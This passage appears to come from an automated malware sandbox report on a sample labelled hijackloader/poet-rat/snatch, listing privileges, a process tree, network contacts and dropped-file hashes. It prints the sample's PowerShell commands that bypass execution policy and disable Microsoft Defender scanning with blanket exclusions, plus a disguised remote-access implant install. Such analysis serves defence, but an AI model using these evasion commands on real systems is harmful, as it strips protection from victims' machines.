| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
C:\Users\Admin\AppData\Local\naver\naver.exe
C:\Users\Admin\AppData\Local\naver\naver.exe -install
C:\Users\Admin\AppData\Local\naver\naver.exe
"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
C:\Windows\System32\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\system32\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\System32\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\system32\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\System32\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\System32\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.logflare.app | udp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.144.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ubiquitous-cucurucho-343e97.netlify.app | udp |
| DE | 3.72.140.173:443 | ubiquitous-cucurucho-343e97.netlify.app | tcp |
| US | 8.8.8.8:53 | pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev | udp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| US | 172.66.0.235:443 | pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev | tcp |
| US | 8.8.8.8:53 | 173.140.72.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | te.legra.ph | udp |
| NL | 149.154.164.13:443 | te.legra.ph | tcp |
| US | 8.8.8.8:53 | 235.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.164.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| US | 172.66.0.235:443 | pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev | tcp |
| US | 172.66.0.235:443 | pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev | tcp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sktelecom.netlify.app | udp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| US | 172.67.144.216:443 | api.logflare.app | tcp |
| DE | 52.58.254.253:443 | sktelecom.netlify.app | tcp |
| US | 8.8.8.8:53 | api.skt.cam | udp |
| US | 172.67.147.63:443 | api.skt.cam | tcp |
| US | 8.8.8.8:53 | 253.254.58.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoft.devq.workers.dev | udp |
| US | 104.21.61.174:443 | microsoft.devq.workers.dev | tcp |
| US | 8.8.8.8:53 | 63.147.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.61.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sktelecom.duckdns.org | udp |
| KR | 203.234.238.140:443 | sktelecom.duckdns.org | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.238.234.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/3660-1-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21kxgm1v.tpz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3660-7-0x000001DAD2350000-0x000001DAD2372000-memory.dmp
memory/3660-12-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
memory/3660-13-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
memory/3660-14-0x000001DAD2BC0000-0x000001DAD2C04000-memory.dmp
memory/2064-15-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
memory/2064-16-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
memory/2064-17-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
memory/3660-27-0x000001DAD2C90000-0x000001DAD2D06000-memory.dmp
memory/2064-30-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
memory/3660-31-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp
memory/3660-32-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
memory/3660-33-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e89c193840c8fb53fc3de104b1c4b092 |
| SHA1 | 8b41b6a392780e48cc33e673cf4412080c42981e |
| SHA256 | 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c |
| SHA512 | 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
memory/3660-52-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp
C:\Users\Admin\AppData\Local\naver\naver.exe
| MD5 | c41e8324cb68c07c2bbff56d645cae53 |
| SHA1 | 13518a95a782ea595aff1e7f15397d2968738718 |
| SHA256 | 4f9f9cc3996b3f8ee33b46263ad726085ee4f06520012bcfb6a2df77ecdb7917 |
| SHA512 | 7b2271be16d9729c32398b62299c5526dc6c9d98ef3213513554eb46f21917f50ab4b82b5e83ca83582c3b570e8a79713d2bf0779162d687aebbd3b47dd0900b |
C:\Users\Admin\AppData\Local\naver\naver.msh
| MD5 | 2dd515ea546a81398d94dd15e3b4d55c |
| SHA1 | eb0b0fca721a296906166b7e972559b87353b726 |
| SHA256 | becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2 |
| SHA512 | 439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb |